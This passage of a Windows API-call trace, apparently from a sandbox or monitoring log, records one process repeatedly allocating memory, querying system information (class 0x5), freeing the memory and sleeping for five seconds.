ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.260] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.277] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.300] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.307] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.328] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.339] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.353] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.370] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.385] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.401] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.416] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.432] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.447] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.463] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.481] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.494] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.510] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.525] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.540] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.556] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.572] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.587] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.603] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.621] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.636] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.650] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.665] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.681] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.697] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.712] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.729] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.743] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.759] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.775] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.790] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.806] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.821] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.838] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.852] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.868] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, 